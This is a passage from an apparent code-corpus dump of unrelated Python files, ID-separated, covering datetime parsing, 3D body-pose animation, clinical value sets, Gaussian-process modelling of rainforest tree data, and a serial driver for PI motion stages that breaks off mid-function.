for v, c in enumerate(membership):
communities[c].append(v)
return communities
def membership_to_layered_communities(membership, layer_membership):
layered_communities = defaultdict(list)
for v, c in enumerate(membership):
layered_communities[(c, layer_membership[v])].append(v)
return layered_communities
def num_communities(membership):
n = len(set(membership))
assert n == max(membership) + 1
return n
|
500071
|
from datetime import datetime
from pytz import timezone, UnknownTimeZoneError
from typing import Union
from .baseclasses import AbsoluteDateTime, RelativeDateTime
from .enums import Method
from .evaluatormethods import EvaluatorMethods
class Evaluator:
def __init__(self, parsed_object, tz="Europe/Berlin"):
"""
:param parsed_object: the parsed object from parser
:param tz: the timezone for the datetime
"""
try:
tiz = timezone(tz)
except UnknownTimeZoneError:
raise ValueError("Unknown timezone: {}".format(tz))
self.parsed_object_type = parsed_object[0]
self.parsed_object_content: Union[list, AbsoluteDateTime, RelativeDateTime] = parsed_object[1]
self.current_datetime: datetime = datetime.strptime(datetime.strftime(datetime.now(tz=tiz), "%Y-%m-%d %H:%M:%S"), "%Y-%m-%d %H:%M:%S")
self.offset = tiz.utcoffset(self.current_datetime)
def evaluate(self) -> Union[datetime, None]:
ev_out = None
ev = EvaluatorMethods(self.parsed_object_content, self.current_datetime, self.offset)
if self.parsed_object_type == Method.ABSOLUTE_DATE_FORMATS:
ev_out = ev.evaluate_absolute_date_formats()
if self.parsed_object_type == Method.ABSOLUTE_PREPOSITIONS:
ev_out = ev.evaluate_absolute_prepositions()
if self.parsed_object_type == Method.CONSTANTS:
ev_out = ev.evaluate_constants()
if self.parsed_object_type == Method.RELATIVE_DATETIMES:
ev_out = ev.evaluate_relative_datetime()
if self.parsed_object_type == Method.CONSTANTS_RELATIVE_EXTENSIONS:
ev_out = ev.evaluate_constant_relatives()
if self.parsed_object_type == Method.DATETIME_DELTA_CONSTANTS:
ev_out = ev.evaluate_datetime_delta_constants()
if ev_out:
return ev_out
else:
raise ValueError
|
500157
|
class HokiDialogue(object):
def __init__(self):
self.RED = '\u001b[31;1m'
self.ORANGE = '\u001b[33;1m'
self.GREEN = '\u001b[32;1m'
self.BLUE = '\u001b[36;1m'
self.ENDC = '\033[0m'
self.BOLD = '\033[1m'
self.UND = '\033[4m'
self.BCKG='\u001b[46;1m'
def info(self):
return f'{self.GREEN}[---INFO---]{self.ENDC}'
def running(self):
return f'{self.ORANGE}[--RUNNING-]{self.ENDC}'
def complete(self):
return f'{self.BLUE}[-COMPLETE-]{self.ENDC}'
def debugger(self):
return f'{self.ORANGE}DEBUGGING ASSISTANT:{self.ENDC}'
def error(self):
return f'{self.RED}HOKI ERROR:{self.ENDC}'
dialogue = HokiDialogue()
|
500163
|
import os, sys
import numpy as np
import torch.backends.cudnn as cudnn
import torch
from tqdm import tqdm
import argparse
import cv2
import imageio
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
from pixielib.pixie import PIXIE
from pixielib.visualizer import Visualizer
from pixielib.datasets.body_datasets import TestData
from pixielib.utils import util
from pixielib.utils.config import cfg as pixie_cfg
def main(args):
savefolder = args.savefolder
device = args.device
os.makedirs(savefolder, exist_ok=True)
# check env
if not torch.cuda.is_available():
print('CUDA is not available! use CPU instead')
else:
cudnn.benchmark = True
torch.backends.cudnn.deterministic = False
torch.backends.cudnn.enabled = True
# load test images
testdata = TestData(args.inputpath, iscrop=args.iscrop, body_detector='rcnn')
# load video for animation sequence
posedata = TestData(args.posepath, iscrop=args.iscrop, body_detector='rcnn')
#-- run PIXIE
pixie_cfg.model.use_tex = args.useTex
pixie = PIXIE(config = pixie_cfg, device=device)
visualizer = Visualizer(render_size=args.render_size, config = pixie_cfg, device=device, rasterizer_type=args.rasterizer_type)
# 1. fit smplx of given image
batch = testdata[0]
util.move_dict_to_device(batch, device)
batch['image'] = batch['image'].unsqueeze(0)
batch['image_hd'] = batch['image_hd'].unsqueeze(0)
name = batch['name']
input_image = batch['image']
data = {
'body': batch
}
param_dict = pixie.encode(data)
input_codedict = param_dict['body']
# vis smplx results
input_opdict = pixie.decode(input_codedict, param_type='body')
input_opdict['albedo'] = visualizer.tex_flame2smplx(input_opdict['albedo'])
visdict = visualizer.render_results(input_opdict, data['body']['image_hd'], overlay=True)
input_image = batch['image_hd'].clone()
input_shape = visdict['shape_images'].clone()
# 2. get the pose/expression of given animation sequence
os.makedirs(os.path.join(savefolder, name), exist_ok=True)
writer = imageio.get_writer(os.path.join(savefolder, 'animation.gif'), mode='I')
for i, batch in enumerate(tqdm(posedata, dynamic_ncols=True)):
if i % 1 ==0:
util.move_dict_to_device(batch, device)
batch['image'] = batch['image'].unsqueeze(0)
batch['image_hd'] = batch['image_hd'].unsqueeze(0)
data = {
'body': batch
}
param_dict = pixie.encode(data)
codedict = param_dict['body']
moderator_weight = param_dict['moderator_weight']
opdict = pixie.decode(codedict, param_type='body')
if args.reproject_mesh and args.rasterizer_type=='standard':
## whether to reproject mesh to original image space
tform = batch['tform'][None, ...]
tform = torch.inverse(tform).transpose(1,2)
original_image = batch['original_image'][None, ...]
visualizer.recover_position(opdict, batch, tform, original_image)
visdict = visualizer.render_results(opdict, data['body']['image_hd'], moderator_weight=moderator_weight, overlay=True)
pose_ref_shape = visdict['color_shape_images'].clone()
# transfer pose and expression
for param in ['shape', 'tex', 'body_cam', 'light']:
codedict[param] = input_codedict[param]
opdict = pixie.decode(codedict, param_type='body')
opdict['albedo'] = input_opdict['albedo']#visualizer.tex_flame2smplx(opdict['albedo'])
visdict = visualizer.render_results(opdict, input_image)
transfered_shape = visdict['shape_images'].clone()
visdict = {
'input': input_image,
'rec': input_shape,
'transfer': transfered_shape,
# 'rendered_images': visdict['rendered_images'],
'pose_ref': batch['image_hd'],
'pose_ref_shape': pose_ref_shape
}
grid_image_all = visualizer.visualize_grid(visdict, size=512)
cv2.imwrite(os.path.join(savefolder, name, f'{name}_animate_{i:05}.jpg'), grid_image_all)
writer.append_data(grid_image_all[:,:,[2,1,0]])
writer.close()
print(f'-- please check the results in {savefolder}')
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='PIXIE')
parser.add_argument('-i', '--inputpath', default='TestSamples/body/woman-in-white-dress-3830468.jpg', type=str,
help='path to the test data, can be image folder, image path, image list, video')
parser.add_argument('-p', '--posepath', default='TestSamples/animation', type=str,
help='path to the test data, can be image folder, image path, image list, video')
parser.add_argument('-s', '--savefolder', default='TestSamples/animation', type=str,
help='path to the output directory, where results(obj, txt files) will be stored.')
parser.add_argument('--device', default='cuda:0', type=str,
help='set device, cpu for using cpu' )
# process test images
parser.add_argument('--iscrop', default=True, type=lambda x: x.lower() in ['true', '1'],
help='whether to crop input image, set false only when the test image are well cropped' )
# rendering option
parser.add_argument('--render_size', default=1024, type=int,
help='image size of renderings' )
parser.add_argument('--rasterizer_type', default='standard', type=str,
help='rasterizer type: pytorch3d or standard' )
parser.add_argument('--reproject_mesh', default=False, type=lambda x: x.lower() in ['true', '1'],
help='whether to reproject the mesh and render it in original image size, \
currently only available if rasterizer_type is standard, because pytorch3d does not support non-squared image...\
default is False, means use the cropped image and its corresponding results')
# save
parser.add_argument('--deca_path', default=None, type=str,
help='absolute path of DECA folder, if exists, will return facial details by running DECA\
details of DECA: https://github.com/YadiraF/DECA' )
parser.add_argument('--useTex', default=True, type=lambda x: x.lower() in ['true', '1'],
help='whether to use FLAME texture model to generate uv texture map, \
set it to True only if you downloaded texture model' )
parser.add_argument('--uvtex_type', default='SMPLX', type=str,
help='texture type to save, can be SMPLX or FLAME')
parser.add_argument('--saveVis', default=True, type=lambda x: x.lower() in ['true', '1'],
help='whether to save visualization of output' )
parser.add_argument('--saveGif', default=True, type=lambda x: x.lower() in ['true', '1'],
help='whether to visualize other views of the output, save as gif' )
parser.add_argument('--saveObj', default=False, type=lambda x: x.lower() in ['true', '1'],
help='whether to save outputs as .obj, \
Note that saving objs could be slow' )
parser.add_argument('--saveParam', default=False, type=lambda x: x.lower() in ['true', '1'],
help='whether to save parameters as pkl file' )
parser.add_argument('--savePred', default=False, type=lambda x: x.lower() in ['true', '1'],
help='whether to save smplx prediction as pkl file' )
parser.add_argument('--saveImages', default=False, type=lambda x: x.lower() in ['true', '1'],
help='whether to save visualization output as seperate images' )
main(parser.parse_args())
|
500172
|
from .base import *
SECRET_KEY = os.environ['DJANGO_SECRET_KEY']
CSRF_COOKIE_SECURE = True
SESSION_COOKIE_SECURE = True
DEBUG = False
ALLOWED_HOSTS = ['*']
|
500181
|
from flask import Blueprint, render_template, request, redirect, url_for, flash
import requests
import logging
import utils
log = logging.getLogger("Nurevam.site")
blueprint = Blueprint('memes', __name__, template_folder='../templates/memes')
name = "memes"
description = "Allow to post a custom memes you like!"
db = None #Database
@utils.plugin_page('memes')
def dashboard(server_id):
log.info("loading cog pages")
db_role = db.smembers('{}:Memes:editor_role'.format(server_id)) or []
get_role = utils.resource_get("/guilds/{}".format(server_id))
guild_roles = get_role['roles']
role = list(filter(lambda r: r['name'] in db_role or r['id'] in db_role, guild_roles))
return {"roles": role, "guild_roles": guild_roles}
@blueprint.route('/update/<int:server_id>', methods=['POST'])
@utils.plugin_method
def update_memes(server_id):
roles = request.form.get('roles').split(',')
db.delete("{}:Memes:editor_role".format(server_id))
if len(roles) > 0:
db.sadd("{}:Memes:editor_role".format(server_id), *roles)
return dashboard(server_id=server_id)
@blueprint.route("/<string:cog>/<int:server_id>/")
@utils.require_role
def memes(cog, server_id):
meme_link = db.hgetall("{}:Memes:link".format(server_id))
return render_template("memes.html", data_memes=meme_link, server_id=server_id)
@blueprint.route('/add/<string:cog>/<int:server_id>/', methods=['POST'])
@utils.require_role
def add_memes(cog, server_id):
name = request.form.get("meme_name")
link = request.form.get("meme_link")
status = utils.check_link(link)
if status == 0: # if is true
if name in db.smembers("{}:Memes:name".format(server_id)):
flash("This name already exists!", "warning")
else:
db.hset("{}:Memes:link".format(server_id), name, link)
db.sadd("{}:Memes:name".format(server_id), name)
flash("You have add a new memes!", "success")
return redirect(url_for("memes.memes", server_id=server_id, cog="memes"))
@blueprint.route('/update/<int:server_id>/<string:name>', methods=['POST'])
@utils.plugin_method
def edit_memes(server_id, name):
new_name = request.form.get("meme_name")
link = request.form.get("meme_link")
status = utils.check_link(link)
if status == 0:
# delete old database
db.hdel("{}:Memes:link".format(server_id), name)
db.srem("{}:Memes:name".format(server_id), name)
# adding, if there is a way to rename them in hash, that would be great...
db.hset("{}:Memes:link".format(server_id), new_name, link)
db.sadd("{}:Memes:name".format(server_id), new_name)
flash("Update data!", "success")
return redirect(url_for("memes.memes", server_id=server_id, cog="memes"))
@blueprint.route('/delete/<int:server_id>/<string:name>/', methods=['GET'])
@utils.plugin_method
def delete_memes(server_id, name):
# Deleting data
db.hdel("{}:Memes:link".format(server_id), name)
db.srem("{}:Memes:name".format(server_id), name)
return redirect(url_for("memes.memes", server_id=server_id, cog="Memes"))
|
500187
|
from torch.nn.modules.module import Module
from ..functions.roi_align_3d import RoIAlignFunction3D
class RoIAlign3D(Module):
def __init__(self, out_size, out_size_depth, spatial_scale, spatial_scale_depth, sample_num=0):
super(RoIAlign3D, self).__init__()
self.out_size = out_size
self.out_size_depth = out_size_depth
self.spatial_scale = float(spatial_scale)
self.spatial_scale_depth = float(spatial_scale_depth)
self.sample_num = int(sample_num)
def forward(self, features, rois):
return RoIAlignFunction3D.apply(features, rois, self.out_size, self.out_size_depth,
self.spatial_scale, self.spatial_scale_depth, self.sample_num)
|
500228
|
from ..factory import Type
class messageCall(Type):
discard_reason = None # type: "CallDiscardReason"
duration = None # type: "int32"
|
500240
|
from ..value_set import ValueSet
class PositiveFinding(ValueSet):
"""
**Clinical Focus:** This value set contains concepts that represent positive test results. This is intended to be paired with other concepts that identify specific medical tests.
**Data Element Scope:** This value set may use the Quality Data Model (QDM) attribute related to Result.
**Inclusion Criteria:** Includes only relevant concepts associated with identifying a positive test result.
**Exclusion Criteria:** Excludes concepts that identify a specific type of medical test.
"""
OID = '2.16.840.1.113883.3.464.1003.121.12.1016'
VALUE_SET_NAME = 'Positive Finding'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
SNOMEDCT = {
'441773004'
}
class TobaccoNonUser(ValueSet):
"""
**Clinical Focus:** This value set contains concepts that represent tobacco non-user status.
**Data Element Scope:** This value set may use the Quality Data Model (QDM) attribute related to Result.
**Inclusion Criteria:** Includes only relevant concepts associated with indicating a patient does not use tobacco products, including smoking and smoke-less tobacco products such as chew, snuff, pipe, cigarette, cigar, etc.
**Exclusion Criteria:** Excludes concepts that may indicate a current tobacco user status.
"""
OID = '2.16.840.1.113883.3.526.3.1189'
VALUE_SET_NAME = 'Tobacco Non-User'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
SNOMEDCT = {
'105539002',
'105540000',
'105541001',
'160618006',
'160620009',
'160621008',
'228491005',
'228492003',
'228493008',
'228501004',
'228502006',
'228503001',
'228511006',
'228512004',
'228513009',
'266919005',
'266921000',
'266922007',
'266923002',
'266924008',
'266925009',
'266928006',
'281018007',
'360890004',
'360900008',
'360918006',
'360929005',
'405746006',
'428081000124100',
'428091000124102',
'451371000124109',
'451381000124107',
'456711000124105',
'48031000119106',
'53896009',
'702975009',
'702979003',
'735128000',
'8392000',
'8517006',
'87739003'
}
class VisualAcuity2040OrBetter(ValueSet):
"""
**Clinical Focus:** This value set contains concepts that represent visual acuity findings that are 20/40 or better.
**Data Element Scope:** This value set may use the Quality Data Model (QDM) attribute related to Result.
**Inclusion Criteria:** Includes only relevant concepts associated with distance vision findings of 20/40 or better.
**Exclusion Criteria:** No exclusions.
"""
OID = '2.16.840.1.113883.3.526.3.1483'
VALUE_SET_NAME = 'Visual Acuity 20/40 or Better'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
SNOMEDCT = {
'422497000',
'423059004',
'423364005',
'423862000',
'424703005'
}
|
500295
|
import bayesnewton
import objax
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import time
import tikzplotlib
print('loading rainforest data ...')
data = np.loadtxt('../data/TRI2TU-data.csv', delimiter=',')
nr = 50 # spatial grid point (y-axis)
nt = 100 # temporal grid points (x-axis)
binsize = 1000 / nt
t, r, Y_ = bayesnewton.utils.discretegrid(data, [0, 1000, 0, 500], [nt, nr])
t_flat, r_flat, Y_flat = t.flatten(), r.flatten(), Y_.flatten()
N = nr * nt # number of data points
np.random.seed(99)
test_ind = np.random.permutation(N)[:N//10]
t_test = t_flat[test_ind]
r_test = r_flat[test_ind]
Y_test = Y_flat[test_ind]
Y_flat[test_ind] = np.nan
Y = Y_flat.reshape(nt, nr)
# put test points on a grid to speed up prediction
X_test = np.concatenate([t_test[:, None], r_test[:, None]], axis=1)
t_test, r_test, Y_test = bayesnewton.utils.create_spatiotemporal_grid(X_test, Y_test)
var_f = 1. # GP variance
len_f = 20. # lengthscale
kern = bayesnewton.kernels.SpatialMatern32(variance=var_f, lengthscale=len_f, z=r[0, ...], sparse=False)
# kern = bayesnewton.kernels.SpatialMatern32(variance=var_f, lengthscale=len_f, z=r[0, ...], sparse=True)
lik = bayesnewton.likelihoods.Poisson(binsize=binsize)
# lik = bayesnewton.likelihoods.Gaussian(variance=1)
# model = bayesnewton.models.VariationalGP(kernel=kern, likelihood=lik, X=x, Y=Y)
model = bayesnewton.models.MarkovVariationalGP(kernel=kern, likelihood=lik, X=t, R=r, Y=Y)
# model = bayesnewton.models.MarkovVariationalGP(kernel=kern, likelihood=lik, X=t_flat, R=r_flat, Y=Y_flat)
# model = bayesnewton.models.InfiniteHorizonVariationalGP(kernel=kern, likelihood=lik, X=t, R=r, Y=Y)
# model = bayesnewton.models.MarkovVariationalGPMeanField(kernel=kern, likelihood=lik, X=t, R=r, Y=Y)
lr_adam = 0.2
lr_newton = 0.2
iters = 10
opt_hypers = objax.optimizer.Adam(model.vars())
energy = objax.GradValues(model.energy, model.vars())
@objax.Function.with_vars(model.vars() + opt_hypers.vars())
def train_op():
model.inference(lr=lr_newton) # perform inference and update variational params
dE, E = energy() # compute energy and its gradients w.r.t. hypers
opt_hypers(lr_adam, dE)
test_nlpd_ = model.negative_log_predictive_density(X=t_test, R=r_test, Y=Y_test)
return E, test_nlpd_
train_op = objax.Jit(train_op)
t0 = time.time()
for i in range(1, iters + 1):
loss, test_nlpd = train_op()
print('iter %2d, energy: %1.4f, nlpd: %1.4f' % (i, loss[0], test_nlpd))
t1 = time.time()
print('optimisation time: %2.2f secs' % (t1-t0))
# calculate posterior predictive distribution via filtering and smoothing at train & test locations:
print('calculating the posterior predictive distribution ...')
t0 = time.time()
posterior_mean, posterior_var = model.predict(X=t, R=r)
# posterior_mean_y, posterior_var_y = model.predict_y(X=t, R=r)
nlpd = model.negative_log_predictive_density(X=t_test, R=r_test, Y=Y_test)
t1 = time.time()
print('prediction time: %2.2f secs' % (t1-t0))
print('nlpd: %2.3f' % nlpd)
link_fn = lik.link_fn
print('plotting ...')
cmap = cm.viridis
plt.figure(1, figsize=(10, 5))
plt.plot(data[:, 0], data[:, 1], 'k.', markersize=2)
plt.title('Tree locations')
plt.xlim(0, 1000)
plt.ylim(0, 500)
plt.figure(2, figsize=(10, 5))
im = plt.imshow(Y_.T / binsize, cmap=cmap, extent=[0, 1000, 0, 500], origin='lower')
plt.colorbar(im, fraction=0.0235, pad=0.04)
plt.title('Tree count data (full).')
plt.figure(3, figsize=(10, 5))
im = plt.imshow(Y.T / binsize, cmap=cmap, extent=[0, 1000, 0, 500], origin='lower')
plt.colorbar(im, fraction=0.0235, pad=0.04)
plt.title('Tree count data (with missing values).')
plt.figure(4, figsize=(10, 5))
im = plt.imshow(link_fn(posterior_mean).T, cmap=cmap, extent=[0, 1000, 0, 500], origin='lower')
# im = plt.imshow(posterior_mean_y.T, cmap=cmap, extent=[0, 1000, 0, 500], origin='lower')
plt.colorbar(im, fraction=0.0235, pad=0.04)
plt.xlim(0, 1000)
plt.ylim(0, 500)
# plt.title('2D log-Gaussian Cox process (rainforest tree data). Log-intensity shown.')
plt.title('2D log-Gaussian Cox process (rainforest tree data). Tree intensity per $m^2$.')
plt.xlabel('first spatial dimension, $t$ (metres)')
plt.ylabel('second spatial dimension, $r$ (metres)')
# plt.figure(5, figsize=(10, 5))
# plt.plot(data[:, 0], data[:, 1], 'k.', markersize=2)
# bayesnewton.utils.bitmappify(plt.gca(), 200)
# plt.xlabel('first spatial dimension, $t$ (metres)')
# plt.ylabel('second spatial dimension, $\\Space$ (metres)')
# plt.xlim(0, 1000)
# plt.ylim(0, 500)
# tikzplotlib.save('/Users/wilkinw1/postdoc/inprogress/ati-fcai/paper/icml2021/fig/tree_locations.tex',
# axis_width='\\figurewidth',
# axis_height='\\figureheight',
# tex_relative_path_to_data='./fig/')
#
# plt.figure(6, figsize=(10, 5))
# im = plt.imshow(link_fn(posterior_mean).T, cmap=cmap, extent=[0, 1000, 0, 500], origin='lower')
# plt.xlim(0, 1000)
# plt.ylim(0, 500)
# plt.xlabel('first spatial dimension, $t$ (metres)')
# plt.ylabel('\\phantom{second spatial dimension, $\\Space$ (metres)}')
# tikzplotlib.save('/Users/wilkinw1/postdoc/inprogress/ati-fcai/paper/icml2021/fig/tree_posterior.tex',
# axis_width='\\figurewidth',
# axis_height='\\figureheight',
# tex_relative_path_to_data='./fig/')
plt.show()
|
500296
|
import time
import serial
try:
import numpy as np
except ImportError:
np = None # You won't be able to use retrieve_data_log()
class C867_XY_Stage:
def __init__(self, which_port, verbose=True):
try:
self.port = serial.Serial(
port=which_port, baudrate=115200, timeout=1)
except:
print("Failed to open serial port", which_port, "for PI stage.",
"Is it on, plugged in, and on the serial port you think?")
raise
self.verbose = verbose
self._moving = False
self._joystick_enabled = True
# The joystick has a 'startup macro', to make sure it behaves as
# desired after power switches on. Make sure nobody messed with
# our startup macro:
self._set_startup_macro()
# Get our initial conditions:
self.get_position()
self.get_velocity()
self.get_acceleration()
# Get position and velocity limits so we can validate user input:
if self.verbose: print("Getting stage limits...")
self.x_min, self.y_min = [
float(a.split('=')[1]) for a in self.send('TMN? 1 2')]
self.x_max, self.y_max = [
float(a.split('=')[1]) for a in self.send('TMX? 1 2')]
self.vx_max, self.vy_max = [
float(a.split('=')[1]) for a in self.send('SPA? 1 0xA 2 0xA')]
self.ax_max, self.ay_max = [
float(a.split('=')[1]) for a in self.send('SPA? 1 0x4A 2 0x4A')]
self.dx_max, self.dy_max = [
float(a.split('=')[1]) for a in self.send('SPA? 1 0x4B 2 0x4B')]
if self.verbose:
print(" Stage x-limits:", self.x_min, self.x_max)
print(" Stage y-limits:", self.y_min, self.y_max)
print(" Stage v-limits:", self.vx_max, self.vy_max)
print(" Stage a-limits:", self.ax_max, self.ay_max)
print(" Stage d-limits:", self.dx_max, self.dy_max, '\n')
return None
def send(self, cmd, res=True):
if self.verbose: print(" Sending command to stage:", cmd)
# Allow cmd to be bytes or string
if type(cmd) is str: cmd = bytes(cmd, encoding='ascii')
assert type(cmd) is bytes
# Communicate:
self.port.write(cmd + b'\n')
responses = []
while res:
response = self.port.readline()
assert response.endswith(b'\n') # We timed out
if self.verbose: print(" Response from stage:", response)
responses.append(response.rstrip().decode('ascii'))
# Non-final responses have a trailing space:
if len(response) == 1: break
if response[-2] != 32: break
# Cleanup:
assert self.port.in_waiting == 0
self._check_errors()
return responses
def move(self, x=None, y=None, blocking=True):
assert x is not None or y is not None
self.finish_moving()
if self.verbose: print("Starting stage motion...")
if self._joystick_enabled:
self.send('JON 3 0', res=False)
cmd_string = ['MOV ']
if x is not None:
self.x = float(x)
assert self.x_min <= self.x <= self.x_max
cmd_string.append('1 %0.9f '%self.x)
if y is not None:
self.y = float(y)
assert self.y_min <= self.y <= self.y_max
cmd_string.append('2 %0.9f '%self.y)
self.send(''.join(cmd_string), res=False)
self._moving = True
if blocking:
self.finish_moving()
return None
def finish_moving(self):
if not self._moving:
return None
if self.verbose: print("Finishing stage motion...")
while True:
self.port.write(b'\x05')
response = self.port.read(2)
if response == b'0\n':
break
self._moving = False
if self._joystick_enabled:
self.send('JON 3 1', res=False)
if self.verbose: print('Stage motion complete.\n')
self._check_errors()
return None
def get_position(self):
if self.verbose: print("Getting stage position...")
self.x, self.y = [float(a.split('=')[1]) for a in self.send('MOV? 1 2')]
if self.verbose: print(" Stage position:", self.x, self.y)
return self.x, self.y
def set_velocity(self, vx=None, vy=None):
assert vx is not None or vy is not None
if self.verbose: print("Setting stage velocity...")
cmd_string = ['VEL ']
if vx is not None:
vx = float(vx)
assert 0 < vx <= self.vx_max
self.vx = vx
cmd_string.append('1 %0.9f '%vx)
if vy is not None:
vy = float(vy)
assert 0 < vy <= self.vy_max
self.vy = vy
cmd_string.append('2 %0.9f '%vy)
self.send(''.join(cmd_string), res=False)
return None
def get_velocity(self):
if self.verbose: print("Getting stage velocity...")
self.vx, self.vy = [float(a.split('=')[1]) for a in self.send('VEL? 1 2')]
if self.verbose: print(" Stage velocity:", self.vx, self.vy)
return self.vx, self.vy
def set_acceleration(self, ax=None, ay=None, dx=None, dy=None):
assert ax is not None or ay is not None or dx is not None or dy is not None
if self.verbose: print("Setting stage acceleration...")
cmd_string = ['ACC ']
if ax is not None:
ax = float(ax)
assert 0 < ax <= self.ax_max
self.ax = ax
cmd_string.append('1 %0.9f '%ax)
if ay is not None:
ay = float(ay)
assert 0 < ay <= self.ay_max
self.ay = ay
cmd_string.append('2 %0.9f '%ay)
self.send(''.join(cmd_string), res=False)
cmd_string = ['DEC ']
if dx is not None:
dx = float(dx)
assert 0 < dx <= self.dx_max
self.dx = dx
cmd_string.append('1 %0.9f '%dx)
if dy is not None:
dy = float(dy)
assert 0 < dy <= self.dy_max
self.dy = dy
cmd_string.append('2 %0.9f '%dy)
self.send(''.join(cmd_string), res=False)
return None
def get_acceleration(self):
if self.verbose: print("Getting stage acceleration...")
self.ax, self.ay = [float(a.split('=')[1]) for a in self.send('ACC? 1 2')]
self.dx, self.dy = [float(a.split('=')[1]) for a in self.send('DEC? 1 2')]
if self.verbose: print(" Stage acceleration:", self.ax, self.ay)
if self.verbose: print(" Stage deceleration:", self.dx, self.dy)
return self.ax, self.ay, self.dx, self.dy
def enable_joystick(self, enabled=True):
if self.verbose: print("Joystick:", enabled)
if enabled == self._joystick_enabled:
return None
self.send(('JON 3 0', 'JON 3 1')[enabled], res=False)
self._joystick_enabled = enabled
return None
def _set_settling_time(self, tx=None, ty=None):
assert tx is not None or ty is not None
if self.verbose: print("Setting stage settling time...")
cmd_string = ['SPA ']
if tx is not None:
tx = float(tx)
assert 0 < tx <= 1 # You wanna wait longer? You crazy
cmd_string.append('1 0x3F %0.9f '%tx)
if ty is not None:
ty = float(ty)
assert 0 < ty <= 1
cmd_string.append('2 0x3F %0.9f '%ty)
self.send(''.join(cmd_string), res=False)
tx, ty = [float(a.split('=')[1]) for a in self.send('SPA? 1 0x3F 2 0x3F')]
return tx, ty
def _set_precision(self, dx=None, dy=None):
assert dx is not None or dy is not None
assert not self._moving
if self.verbose: print("Setting stage precision...")
# Our 'precision' parameters are bounded by other 'precision' parameters:
dx_max, dy_max = [float(a.split('=')[1])
for a in self.send('SPA? 1 0x416 2 0x416')]
cmd_string_1 = ['SPA ']
cmd_string_2 = ['SPA ']
if dx is not None:
dx = int(dx)
assert 1 < dx <= dx_max
cmd_string_1.append('1 0x407 %d '%dx)
cmd_string_2.append('1 0x406 %d '%(dx - 1))
if dy is not None:
dy = int(dy)
assert 1 < dy <= dy_max
cmd_string_1.append('2 0x407 %d '%dy)
cmd_string_2.append('2 0x406 %d '%(dy - 1))
# You have to turn off the servo and joystick to change precision:
if self.verbose: print(' ', end='', sep='')
self.enable_joystick(False)
self.send('SVO 1 0 2 0', res=False)
self.send(''.join(cmd_string_2), res=False)
self.send(''.join(cmd_string_1), res=False)
# Turn the servo back on, re-reference the stage, and turn the
# joystick back on:
self.send('SVO 1 1 2 1', res=False)
self.send('FRF', res=False)
while True: # Finish the reference move
self.port.write(b'\x05')
response = self.port.read(2)
if response == b'0\n':
break
if self.verbose: print(' ', end='', sep='')
self.enable_joystick(True)
dx, dy = [int(a.split('=')[1])
for a in self.send('SPA? 1 0x406 2 0x406')]
return dx, dy
def _set_startup_macro(self):
if self.verbose: print("Checking stage STARTUP macro...")
# Check if the STARTUP macro is set to run on startup:
if self.send('MAC DEF?')[0] == 'STARTUP':
# Check if the STARTUP macro is defined
if 'STARTUP' in self.send('MAC?'):
# Check if the STARTUP macro is what we expect:
old_verbose, self.verbose = self.verbose, False #Temp silence
startup_macro = self.send('MAC? STARTUP')
self.verbose = old_verbose
if startup_macro == [
'JON 1 0',
'SVO 1 1 2 1',
'FRF',
'WAC ONT? 1 = 1',
'WAC ONT? 2 = 1',
'JDT 3 1 2',
'JDT 3 2 2',
'JAX 3 1 1',
'JAX 3 2 2',
'JON 3 1',
'VEL 1 50 2 50']:
if self.verbose: print(' Found expected stage STARTUP macro')
return None
if self.verbose: print('Resetting STARTUP macro...')
# Check if there's a running macro:
if self.send('RMC?')[0] != '':
# ...which could be doing all kinds of crazy things; kill it
# by unsetting the startup macro and rebooting
self.send('MAC DEF', res=False)
self._reboot(finish_macro=False)
# Define our new startup macro:
self.send(
'MAC BEG STARTUP\n'
'JON 1 0\n'
'SVO 1 1 2 1\n'
'FRF\n'
'WAC ONT? 1 = 1\n'
'WAC ONT? 2 = 1\n'
'JDT 3 1 2\n'
'JDT 3 2 2\n'
'JAX 3 1 1\n'
'JAX 3 2 2\n'
'JON 3 1\n'
'VEL 1 50 2 50\n'
'MAC END',
res=False)
# Set it to run at startup, and reboot again.
self.send('MAC DEF STARTUP', res=False)
self._reboot()
# Wait for our startup macro to finish:
while self.send('RMC?')[0] == 'STARTUP': time.sleep(0.4)
return None
def _reboot(self, finish_macro=True):
if self.verbose: print('Rebooting stage', end='')
self.port.write(b'RBT\n')
time.sleep(0.2) #Give it time to reboot
self._check_errors()
if finish_macro:
self.verbose, old_verbose = False, self.verbose
while self.send('RMC?')[0] != '':
print('.', sep='', end='')
time.sleep(0.3)
self.verbose = old_verbose
if self.verbose: print('done')
return None
def _check_errors(self):
self.port.write(b'ERR?\n')
self.err = self.port.readline()
if not self.err == b'0\n':
raise RuntimeError("XY stage error code: "+self.err.decode("ascii"))
return None
def close(self):
self.port.close()
class E753_Z_Piezo:
def __init__(self, which_port, verbose=True):
try:
self.port = serial.Serial(
port=which_port, baudrate=115200, timeout=1)
except:
print("Failed to open serial port", which_port, "for PI Z-piezo.",
"Is it on, plugged in, and at the serial port you think?")
raise
self.verbose = False # Init quietly, get loud later.
if verbose: print('Initializing Z-piezo...', end='')
self.pos_min = float(self.send('TMN?')[0].split('=')[1])
self.pos_max = float(self.send('TMX?')[0].split('=')[1])
self.get_target_position()
self.get_real_position()
self.set_analog_control_state(False)
self.analog_offset = float( # We want this to be 50
self.send('SPA? 2 0x02000200')[0].split('=')[1])
self.analog_gain = float( # We want this to be 0.5
self.send('SPA? 2 0x02000300')[0].split('=')[1])
if (abs(self.analog_offset - 50.0) > 1e-5 or
abs(self.analog_gain - 0.5) > 1e-5):
self._set_offset_and_gain()
self._set_closed_loop_control_parameters(
p_term=.09, i_term=.000166, notch1_freq=480.0, notch2_freq=520.0,
notch1_rej=.050, notch2_rej=.050, slew_rate=2.5e6)
self.set_closed_loop()
self.verbose = verbose
if self.verbose:
print(".done!")
print(" Z-piezo limits: (", self.pos_min, ', ',
self.pos_max, ') microns', sep='')
print(" Z-piezo target:", self.target_pos, 'microns')
print(" Z-piezo actual:", self.real_pos, 'microns')
print(" Z-piezo analog control:", self.analog_control)
return None
def send(self, cmd, res=True):
if self.verbose: print(" Sending command to Z-piezo:", cmd)
# Allow cmd to be bytes or string
if type(cmd) is str: cmd = bytes(cmd, encoding='ascii')
assert type(cmd) is bytes
# Communicate:
self.port.write(cmd + b'\n')
responses = []
